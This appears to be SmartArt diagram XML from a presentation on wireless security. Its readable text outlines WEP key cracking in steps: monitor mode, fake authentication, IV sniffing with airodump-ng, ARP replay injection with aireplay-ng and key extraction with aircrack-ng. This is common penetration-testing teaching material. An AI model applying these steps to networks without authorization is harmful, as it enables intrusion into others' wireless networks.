    <dgm:cxn modelId="{3D366117-F89C-41FB-8824-15C8CE118097}" srcId="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180}" destId="{D16C108D-C435-4295-97E3-0826C7F8A7FC}" srcOrd="0" destOrd="0" parTransId="{55804A3F-8103-4C8C-B77B-DA37F4F07131}" sibTransId="{BC4242D4-01A0-4804-B882-FC09ECB435D1}"/>
    <dgm:cxn modelId="{C960D21B-0596-4E0B-942B-1801045BD461}" type="presOf" srcId="{ED67F555-87C6-4909-A537-0F09561C0CBE}" destId="{20A58F3B-DD3F-43A3-875D-4579A8FD7627}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{59ECE22A-6CF3-4951-BB11-268B3E4CCC59}" srcId="{ED67F555-87C6-4909-A537-0F09561C0CBE}" destId="{4A9C3EA4-B8EE-4979-8987-B21B672AC41A}" srcOrd="0" destOrd="0" parTransId="{BB363E53-40D3-4A8F-84CF-FA0D7ACBE8D1}" sibTransId="{F36E0071-8AB0-4EE3-AAB8-189E378D2673}"/>
    <dgm:cxn modelId="{72169433-5BA9-4FE6-A5BC-234BA9759062}" type="presOf" srcId="{D16C108D-C435-4295-97E3-0826C7F8A7FC}" destId="{09B684CB-CA4C-4031-A719-B38D55EFD2A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8718516A-05F1-4110-A024-A0A0F0DDA125}" type="presOf" srcId="{8913F1DF-5EE0-4F72-B883-1A844FB414A9}" destId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4995B755-F5BA-4D33-B30E-C8747A786D03}" type="presOf" srcId="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180}" destId="{BCB0D47D-B3F9-4FE8-84DE-923AEAA1F95C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9B17B359-F11E-407A-940D-D2E30AD3F177}" type="presOf" srcId="{7309945B-E406-4769-B292-7E746E74FE47}" destId="{1E1A2270-E771-4655-B665-1B486693EC5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{EF3DB484-A600-475A-B25E-EFEB33F0FA86}" srcId="{8913F1DF-5EE0-4F72-B883-1A844FB414A9}" destId="{ED67F555-87C6-4909-A537-0F09561C0CBE}" srcOrd="1" destOrd="0" parTransId="{D66D9A30-AE50-4E53-97FF-E7E050EA129A}" sibTransId="{8786AF9B-4019-45A0-90D4-9F0A40B2524A}"/>
    <dgm:cxn modelId="{CBDBFBA3-FA40-41E2-8459-2834341E3D9D}" type="presOf" srcId="{335BC91E-8782-4F9C-953B-663C1F19EEC0}" destId="{0B7BE075-5BC7-431C-9477-A834CBBDEAC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9BE72FB3-2CCF-4511-AF03-669604D8374B}" srcId="{8913F1DF-5EE0-4F72-B883-1A844FB414A9}" destId="{1A2C11E0-677F-4DA1-ACDA-ABBF52799180}" srcOrd="2" destOrd="0" parTransId="{C4A2D848-0C9F-4CE2-A865-3E77506D089C}" sibTransId="{F6533B6A-8889-4DC6-BA83-796FC803BA94}"/>
    <dgm:cxn modelId="{CAEA0EB7-71D1-42F1-BA6D-83F095E80538}" srcId="{7309945B-E406-4769-B292-7E746E74FE47}" destId="{335BC91E-8782-4F9C-953B-663C1F19EEC0}" srcOrd="0" destOrd="0" parTransId="{0C8F0234-BC7F-4488-834C-F888AC1309A4}" sibTransId="{578928AD-37C2-4949-A48E-835B22ED1E05}"/>
    <dgm:cxn modelId="{5FAB63F2-3E27-4F0D-9394-10AAFB3B1B55}" type="presOf" srcId="{4A9C3EA4-B8EE-4979-8987-B21B672AC41A}" destId="{202EFA51-8867-4919-B960-1E0796925DBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{94D9D575-3F28-4977-BB43-C36824A18F90}" type="presParOf" srcId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" destId="{6EEF2578-7AC8-4A68-9290-D4F6E1703B6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{123534A6-5D4A-42DB-9144-12DD3A99EA8A}" type="presParOf" srcId="{6EEF2578-7AC8-4A68-9290-D4F6E1703B6B}" destId="{1E1A2270-E771-4655-B665-1B486693EC5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B793DC8C-3F2A-4C1B-BE78-6C6D4E7ABA05}" type="presParOf" srcId="{6EEF2578-7AC8-4A68-9290-D4F6E1703B6B}" destId="{0B7BE075-5BC7-431C-9477-A834CBBDEAC0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{88B501DF-85E0-47E6-9C94-CC92ED95917E}" type="presParOf" srcId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" destId="{4AA508D8-91DE-49CF-9A3C-0CBB0557F024}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{19FB34B5-DC2F-4674-817B-75D5827C3D85}" type="presParOf" srcId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" destId="{4C2E058B-B9DA-4021-A9EE-4344A77C7374}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8DEB4449-5173-447C-872B-25DAE981B479}" type="presParOf" srcId="{4C2E058B-B9DA-4021-A9EE-4344A77C7374}" destId="{20A58F3B-DD3F-43A3-875D-4579A8FD7627}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{21F2814E-8CDC-4517-A2BB-ED0D8E3D72A2}" type="presParOf" srcId="{4C2E058B-B9DA-4021-A9EE-4344A77C7374}" destId="{202EFA51-8867-4919-B960-1E0796925DBD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4C851D3E-E3FD-4E0F-8F4E-6E4DAAEC4B6A}" type="presParOf" srcId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" destId="{CB1CBF05-BE69-4A8E-89D0-0866C48C1BCA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A3332652-6B8C-480D-A352-DC5056E6EA94}" type="presParOf" srcId="{B0442719-D14D-4A1A-B80D-3828F551DFA2}" destId="{8C648400-D281-4E5C-AE4B-F865AE4CBD8D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F998954B-15BB-4195-89B6-859BFD0786E0}" type="presParOf" srcId="{8C648400-D281-4E5C-AE4B-F865AE4CBD8D}" destId="{BCB0D47D-B3F9-4FE8-84DE-923AEAA1F95C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{0A5D8B55-87FF-4F51-BEAB-D81C4BF289AA}" type="presParOf" srcId="{8C648400-D281-4E5C-AE4B-F865AE4CBD8D}" destId="{09B684CB-CA4C-4031-A719-B38D55EFD2A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CD74DB-2E30-4E11-A786-C26BABB1B400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BF36CCBD-7A63-4503-869B-DBAC155FBBA4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0"/>
            <a:t>Start the wireless interface in monitor mode on the specific access point channel</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426BF1B9-9B45-470F-9559-4F87C8205F50}" type="parTrans" cxnId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}" type="sibTrans" cxnId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Test the injection capability of the wireless device to the access point</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56E97C59-B95C-45E9-9044-0C5265A13584}" type="parTrans" cxnId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}" type="sibTrans" cxnId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFB5096B-CB88-4898-9CA6-3553056016AA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use a tool such as aireplay-ng to do a fake authentication with the access point</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5FF8363-8B1D-43F1-BFCA-A8670ABF6B2A}" type="parTrans" cxnId="{FF1B1626-1183-4C35-A80F-81707B0001CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02A9D25C-8C68-4DFD-AB5C-8278CF91392B}" type="sibTrans" cxnId="{FF1B1626-1183-4C35-A80F-81707B0001CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" type="pres">
      <dgm:prSet presAssocID="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4274C8A-5DD5-4259-A16A-29BFF8BC338F}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="bgChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="104481" custScaleY="229053"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="3" custScaleY="229053">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49961D21-79FD-4837-B49E-CA50087F5D85}" type="pres">
      <dgm:prSet presAssocID="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9F606B4-D837-424D-9D67-E0777070B351}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="bgChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="119026" custScaleY="229053"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" type="pres">
      <dgm:prSet presAssocID="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="3" custScaleY="229053">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CA07512-F8B1-42E8-806B-76B39C4EE79D}" type="pres">
      <dgm:prSet presAssocID="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68038528-9693-495B-8A02-2D83BE99FA3E}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="bgChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="111151" custScaleY="229053"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE}" type="pres">
      <dgm:prSet presAssocID="{BFB5096B-CB88-4898-9CA6-3553056016AA}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="3" custScaleY="229053">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{84A71801-BD4C-44CA-97BE-912E35270615}" type="presOf" srcId="{BFB5096B-CB88-4898-9CA6-3553056016AA}" destId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{FF1B1626-1183-4C35-A80F-81707B0001CB}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{BFB5096B-CB88-4898-9CA6-3553056016AA}" srcOrd="2" destOrd="0" parTransId="{B5FF8363-8B1D-43F1-BFCA-A8670ABF6B2A}" sibTransId="{02A9D25C-8C68-4DFD-AB5C-8278CF91392B}"/>
    <dgm:cxn modelId="{5226FA28-37FB-4E52-AA99-12240116C8C1}" type="presOf" srcId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" destId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" srcOrd="0" destOrd="0" parTransId="{426BF1B9-9B45-470F-9559-4F87C8205F50}" sibTransId="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}"/>
    <dgm:cxn modelId="{D876B46F-DDFB-457C-B181-020426751BD0}" type="presOf" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}" srcId="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" destId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}" srcOrd="1" destOrd="0" parTransId="{56E97C59-B95C-45E9-9044-0C5265A13584}" sibTransId="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}"/>
    <dgm:cxn modelId="{1CD06BFB-A513-42C0-9E52-23C49FE3B0F2}" type="presOf" srcId="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" destId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{C4E81A84-C20A-4028-B466-C8D2DC1D0304}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2BAC147E-F3B3-4F06-B3E4-93DD5DDCE7CF}" type="presParOf" srcId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" destId="{C4274C8A-5DD5-4259-A16A-29BFF8BC338F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A93101D6-F845-4BCF-9DA5-F59D14F377D3}" type="presParOf" srcId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" destId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2237F7D1-9F3B-4C94-8BF2-0B7A341D0B79}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{49961D21-79FD-4837-B49E-CA50087F5D85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7589D527-A905-4B72-9DBB-0666434677C4}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{B9F606B4-D837-424D-9D67-E0777070B351}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{58CF94FA-C791-4DA5-948A-DEB669E85C64}" type="presParOf" srcId="{B9F606B4-D837-424D-9D67-E0777070B351}" destId="{B9B9A95E-D1FF-45E4-A2CC-CFD1E878CD57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{1AA90171-2328-4BEF-82DF-B55D0068CA27}" type="presParOf" srcId="{B9F606B4-D837-424D-9D67-E0777070B351}" destId="{597F42AC-057E-43DE-8674-CCC1B3F0B7D1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D6F985A8-BDFA-43F8-843A-BA78C1C87B65}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{6CA07512-F8B1-42E8-806B-76B39C4EE79D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5AA6D801-DCC7-498C-9052-3C24B4E08BD1}" type="presParOf" srcId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" destId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0CE9068B-4290-4926-BB13-FE6AF5CFB458}" type="presParOf" srcId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" destId="{68038528-9693-495B-8A02-2D83BE99FA3E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{FBBE66FC-A7FE-401B-BBE7-4AF4DC06EA75}" type="presParOf" srcId="{1E83C46C-8512-444C-B1C9-6B2EBDD2161D}" destId="{7A0F3292-CE0D-4C1C-9D64-91A31D486FCE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CD74DB-2E30-4E11-A786-C26BABB1B400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BF36CCBD-7A63-4503-869B-DBAC155FBBA4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0"/>
            <a:t>Start Wi-Fi sniffing tool such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
            <a:t>airodump</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0"/>
            <a:t>-ng or Cain &amp; Abel with a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
            <a:t>bssid</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0"/>
            <a:t> filter to collect unique </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0" err="1"/>
            <a:t>Ivs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2700" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426BF1B9-9B45-470F-9559-4F87C8205F50}" type="parTrans" cxnId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}" type="sibTrans" cxnId="{05A0553E-A7A1-449E-92AD-8BD9CA835E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4DBD477-23B9-4D9A-B312-206D8D04074D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0"/>
            <a:t>Start a Wi-fi packet encryption tool such as aireplay—ng in ARP request reply mode to inject packets</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56E97C59-B95C-45E9-9044-0C5265A13584}" type="parTrans" cxnId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12FFE6CD-DB4E-439A-B87A-EBEF8C48E10A}" type="sibTrans" cxnId="{F60D589B-CCC5-4F3D-B0A7-853C51CF6861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFB5096B-CB88-4898-9CA6-3553056016AA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2500" dirty="0"/>
            <a:t>Run</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" baseline="0" dirty="0"/>
            <a:t> a cracking tool such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" baseline="0" dirty="0" err="1"/>
            <a:t>aircrack</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2700" baseline="0" dirty="0"/>
            <a:t>-ng</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" baseline="0" dirty="0"/>
            <a:t> to extract encryption key from the IVs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2500" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5FF8363-8B1D-43F1-BFCA-A8670ABF6B2A}" type="parTrans" cxnId="{FF1B1626-1183-4C35-A80F-81707B0001CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02A9D25C-8C68-4DFD-AB5C-8278CF91392B}" type="sibTrans" cxnId="{FF1B1626-1183-4C35-A80F-81707B0001CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97B063DD-E179-4E1B-82CD-A26B7705DC8E}" type="pres">
      <dgm:prSet presAssocID="{B5CD74DB-2E30-4E11-A786-C26BABB1B400}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1FAC5434-5693-4F0A-9B2A-A04BFB729E68}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4274C8A-5DD5-4259-A16A-29BFF8BC338F}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="bgChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="114587" custScaleY="220382"/>
      <dgm:spPr>
        <a:effectLst>
          <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
        </a:effectLst>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{00A13D14-7267-4EB4-A4B0-2586EA810C00}" type="pres">
      <dgm:prSet presAssocID="{BF36CCBD-7A63-4503-869B-DBAC155FBBA4}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="3" custScaleY="220382" custLinFactNeighborX="-1461" custLinFactNeighborY="838">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49961D21-79FD-4837-B49E-CA50087F5D85}" type="pres">
      <dgm:prSet presAssocID="{403C6A54-C41C-4EC0-A83F-92B4A6E46B4A}" presName="compositeSpace" presStyleCnt="0"/>
